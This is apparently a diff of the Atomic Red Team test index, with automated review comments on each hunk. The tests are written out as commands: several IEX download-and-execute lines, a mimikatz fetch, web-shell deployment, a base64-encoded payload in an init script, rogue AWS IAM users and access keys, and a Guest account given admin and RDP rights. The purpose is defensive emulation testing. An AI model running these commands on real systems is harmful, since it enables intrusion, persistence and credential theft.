command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
name: powershell
@@ -30704,7 +31078,8 @@ defense-evasion:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
@@ -30740,6 +31115,7 @@ defense-evasion:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -30752,6 +31128,7 @@ defense-evasion:
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -34247,30 +34624,26 @@ defense-evasion:
atomic_tests:
- name: WINWORD Remote Template Injection
auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
description: 'Open a .docx file that loads a remote .dotm macro enabled template.
Executes the code specified within the .dotm template.Requires download of
WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens
Calculator.exe when test sucessfully executed, while AV turned off.
'
description: "Open a .docx file that loads a remote .dotm macro enabled template
from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
\nExecutes the code specified within the .dotm template.\nRequires download
of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
\ \nDefault docs file opens Calculator.exe when test sucessfully executed,
while AV turned off.\n"
supported_platforms:
- windows
input_arguments:
docx file:
docx_file:
description: Location of the test docx file on the local filesystem.
type: Path
default: PathToAtomicsFolder\T1221\src\Calculator.docx
dotm template:
description: Location of the test dotm template on the remote server.
type: Path
default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
dependency_executor_name: powershell
dependencies:
- description: ''
prereq_command: ''
get_prereq_command: ''
executor:
command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
command: 'start #{docx_file}
'
name: command_prompt
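Review bot: `start #{docx_file}` breaks when the expanded path contains a space, because cmd's `start` treats the first quoted token as a window title; the robust form is `command: 'start "" "#{docx_file}"'`. The rewritten description keeps the typos "Ofiice" and "sucessfully", and it links the template via a `tree/master` URL, which serves an HTML page rather than the .dotm — if the link is informational only, say so, since `dotm template` is no longer an input argument.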
@@ -34801,8 +35174,9 @@ defense-evasion:
supported_platforms:
- windows
executor:
command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-UseBasicParsing); Get-System -Technique NamedPipe -Verbose
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
@@ -34813,8 +35187,9 @@ defense-evasion:
supported_platforms:
- windows
executor:
command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-UseBasicParsing); Get-System -Technique Token -Verbose
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
T1205:
@@ -36382,6 +36757,39 @@ persistence:
'
name: powershell
- name: AWS - Create a group and add a user to that group
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
description: 'Adversaries create AWS group, add users to specific to that group
to elevate their privilieges to gain more accesss
'
supported_platforms:
- iaas:aws
input_arguments:
username:
description: Name of the AWS group to create
type: String
default: atomicredteam
dependencies:
- description: 'Check if the user exists, we can only add a user to a group
if the user exists.
'
prereq_command: 'aws iam list-users | grep #{username}
'
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic test
'
executor:
command: |
aws iam create-group --group-name #{username}
aws iam add-user-to-group --user-name #{username} --group-name #{username}
cleanup_command: |
aws iam remove-user-from-group --user-name #{username} --group-name #{username}
aws iam delete-group --group-name #{username}
name: sh
T1547.014:
technique:
external_references:
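Review bot: The input argument is named `username` and described as "Name of the AWS group to create", yet the command passes the same value to both `--user-name` and `--group-name`; either describe it as `Name used for both the IAM user to add and the IAM group to create` or split it into `username` and `group_name` arguments. The prerequisite `aws iam list-users | grep #{username}` is a substring match that passes for any user whose name merely contains the string; `aws iam get-user --user-name #{username}` checks the exact user and exits non-zero when it does not exist. Typos in the description: "privilieges", "accesss".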
@@ -36635,7 +37043,42 @@ persistence:
x_mitre_platforms:
- IaaS
- Azure AD
atomic_tests: []
identifier: T1098.001
atomic_tests:
- name: AWS - Create Access Key and Secret Key
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
description: 'Adversaries create their own new access and secret keys to programatically
interact with AWS environment, which is already compromised
'
supported_platforms:
- iaas:aws
input_arguments:
username:
description: Create new AWS access and secret keys for the user
type: String
default: atomicredteam
dependencies:
- description: 'Check if the user exists.
'
prereq_command: 'aws iam list-users | grep #{username}
'
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic
'
executor:
command: |
aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
cd $PathToAtomicsFolder/T1098.001/bin/
./aws_secret.sh
cleanup_command: |
access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
aws iam delete-access-key --access-key-id $access_key --user-name #{username}
rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
name: sh
T1546.009:
technique:
external_references:
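Review bot: The cleanup depends on `jq` and the executor on `./aws_secret.sh`, but the only declared dependency is the user-existence check, so a host without `jq` completes the test and then fails to delete the new access key, leaving a live long-lived credential in IAM plus its plaintext copy in `aws_secret.creds`. Add a dependency such as `prereq_command: 'command -v jq && test -x $PathToAtomicsFolder/T1098.001/bin/aws_secret.sh'` with a matching `get_prereq_command` message. The `auto_generated_guid` `8822c3b0-d9f9-4daf-a043-491160a31122` differs from the group test's `8822c3b0-d9f9-4daf-a043-49f110a31122` by two characters, which looks hand-edited rather than generated; please regenerate it.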
@@ -36802,7 +37245,8 @@ persistence:
computer starts up various applications and may in fact drive you crazy. A
reliable way to make the message box appear and verify the \nAppInit Dlls
are loading is to start the notepad application. Be sure to run the cleanup
commands afterwards so you don't keep getting message boxes showing up\n"
commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
supported_platforms:
- windows
input_arguments:
@@ -37435,7 +37879,7 @@ persistence:
command: |
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
@@ -38205,7 +38649,43 @@ persistence:
- Office 365
- IaaS
- Google Workspace
atomic_tests: []
identifier: T1136.003
atomic_tests:
- name: AWS - Create a new IAM user
auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
description: 'Creates a new IAM user in AWS. Upon successful creation, a new
user will be created. Adversaries create new IAM users so that their malicious
activity do not interupt the normal functions of the compromised users and
can remain undetected for a long time
'
supported_platforms:
- iaas:aws
input_arguments:
username:
description: Username of the IAM user to create in AWS
type: String
default: atomicredteam
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: 'aws iam create-user --user-name #{username}
'
cleanup_command: 'aws iam delete-user --user-name #{username}
'
name: sh
elevation_required: false
T1078.004:
technique:
id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
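Review bot: The prerequisite `cat ~/.aws/credentials | grep "default"` only proves that the word "default" occurs somewhere in that file; it rejects configurations supplied via environment variables, `AWS_PROFILE` or SSO, and passes on a file whose default stanza holds stale keys. `prereq_command: 'aws sts get-caller-identity >/dev/null 2>&1'` verifies that the CLI is installed and the active credentials actually work, which is what the two AWS tests that tell the operator to run T1136.003 first rely on. Typos in the description and prereq message: "interupt", "defult".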
@@ -39064,9 +39544,9 @@ persistence:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
description: |
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -39078,6 +39558,10 @@ persistence:
description: Specify the guest password
type: String
default: Password123!
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -39090,8 +39574,9 @@ persistence:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1136.002:
@@ -41670,11 +42155,11 @@ persistence:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
name: command_prompt
T1137.001:
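Review bot: The rewritten `reg add` names a subkey `Level` and, with no `/v`, sets that subkey's (Default) value; as far as I know Outlook reads its macro security level from a DWORD value named `Level` under the `...\Outlook\Security` key, so the intended line is `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f` with the matching cleanup `reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f`. The cleanup deletes rather than restores the previous value, so a host that had the value set before the test ends in a different state than it started; the description should say so.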
@@ -43942,7 +44427,8 @@ persistence:
'
executor:
command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
@@ -44860,6 +45346,48 @@ persistence:
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
name: bash
- name: Create Systemd Service file, Enable the service , Modify and Reload the
service.
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
description: "This test creates a systemd service unit file and enables it to
autostart on boot. Once service is created and enabled, it also modifies this
same service file showcasing both Creation and Modification of system process.
\n"
supported_platforms:
- linux
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
'
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
'
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
'
executor:
name: bash
elevation_required: true
command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
: \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
\"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
| sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
restart T1543.002\n"
cleanup_command: |
systemctl stop T1543.002
systemctl disable T1543.002
rm -rf /etc/init.d/T1543.002
systemctl daemon-reload
T1053.006:
technique:
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
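Review bot: `exit /b 0` and `exit /b 1` in `prereq_command` are cmd.exe syntax; under the `bash` executor declared here `exit` rejects the non-numeric argument, so the prerequisite reports failure even on a supported distribution — use `exit 0` and `exit 1`. The description speaks of a systemd unit file, but the command writes an init.d script at `/etc/init.d/T1543.002`, and the embedded base64 payload appears to write marker files under `/tmp/T1543.002.systemd.service.*` that the cleanup never removes; state both in the description or extend the cleanup. The same test text appears earlier in this diff in the privilege-escalation section, where the same fixes apply.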
@@ -45699,15 +46227,16 @@ persistence:
get_prereq_command: |
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
executor:
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path} /q >nul 2>&1
command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
'
cleanup_command: |
del #{web_shell_path}\b.jsp /q >nul 2>&1
del #{web_shell_path}\tests.jsp /q >nul 2>&1
del #{web_shell_path}\cmd.aspx /q >nul 2>&1
name: command_prompt
T1546.003:
technique:
@@ -46877,6 +47406,21 @@ impact:
cleanup_command: |
$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
rm #{encrypted_file_path}
- name: PureLocker Ransom Note
auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
\nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
'
cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
'
T1565:
technique:
external_references:
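Review bot: `elevation_required: true` is not needed to write a text file to `%USERPROFILE%\Desktop`, and if the runner elevates under a different account the note presumably lands on that account's Desktop rather than the current user's; drop the flag or document why it is required. The description should be a full sentence, e.g. `Creates the PureLocker ransom-note IOC (YOUR_FILES.txt) on the current user's desktop.`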
@@ -49663,10 +50207,9 @@ discovery:
supported_platforms:
- windows
executor:
command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-UseBasicParsing); Find-LocalAdminAccess -Verbose
'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
name: powershell
- name: Find local admins on all machines in domain (PowerView)
auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -49678,10 +50221,9 @@ discovery:
supported_platforms:
- windows
executor:
command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
name: powershell
- name: Find Local Admins via Group Policy (PowerView)
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
@@ -49697,9 +50239,9 @@ discovery:
type: Path
default: "$env:COMPUTERNAME"
executor:
command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name}
-Verbose'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
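Review bot: The new `command` block ends with a stray double quote (`-Verbose"`), which becomes part of the PowerShell command and leaves an unterminated string, so the test fails to parse; it looks like a leftover from the old single-quoted YAML scalar. End the line with `-ComputerName #{computer_name} -Verbose`.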
@@ -49759,10 +50301,9 @@ discovery:
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: "#{adfind_path} -f (objectcategory=group)\n"
name: command_prompt
@@ -50841,11 +51382,22 @@ discovery:
'
supported_platforms:
- windows
executor:
command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
dependency_executor_name: powershell
dependencies:
- description: 'Endpoint must be joined to domain
'
prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
{exit 0} else {exit 1}
'
get_prereq_command: '"Join system to domain"
'
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
name: powershell
T1040:
technique:
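Review bot: The new domain-join prerequisite is added only to this Find-DomainShare test, while the other PowerView tests touched by this commit (@@ -49663, -49678, -49697, -52908) have the same requirement and still fail confusingly off-domain; consider adding the same dependency block there. `Get-WmiObject` exists only in Windows PowerShell; `(Get-CimInstance -ClassName Win32_ComputerSystem).PartOfDomain` works there and in PowerShell 7. `get_prereq_command: '"Join system to domain"'` merely evaluates a string literal; `Write-Host "Join system to domain"` reads as the manual instruction it is meant to be.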
@@ -52337,7 +52889,7 @@ discovery:
vbscript:
description: Path to sample script
type: String
default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
executor:
command: 'cscript #{vbscript}'
name: powershell
@@ -52908,10 +53460,9 @@ discovery:
supported_platforms:
- windows
executor:
command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
'
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
name: powershell
T1007:
technique:
@@ -58178,7 +58729,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -58239,7 +58791,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -58277,7 +58830,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -58314,7 +58868,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
@@ -58448,7 +59003,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
- name: Potentially Unwanted Applications (PUA)
@@ -59667,7 +60223,8 @@ execution:
'
executor:
command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
@@ -60076,7 +60633,41 @@ execution:
x_mitre_remote_support: true
x_mitre_contributors:
- Shane Tully, @securitygypsy
atomic_tests: []
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
'
supported_platforms:
- windows
input_arguments:
radmin_installer:
description: Radmin Viewer installer
type: Path
default: "%TEMP%\\RadminViewer.msi"
radmin_exe:
description: The radmin.exe executable from RadminViewer.msi
type: Path
default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
dependencies:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
'
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
'
get_prereq_command: |
echo Downloading radmin installer
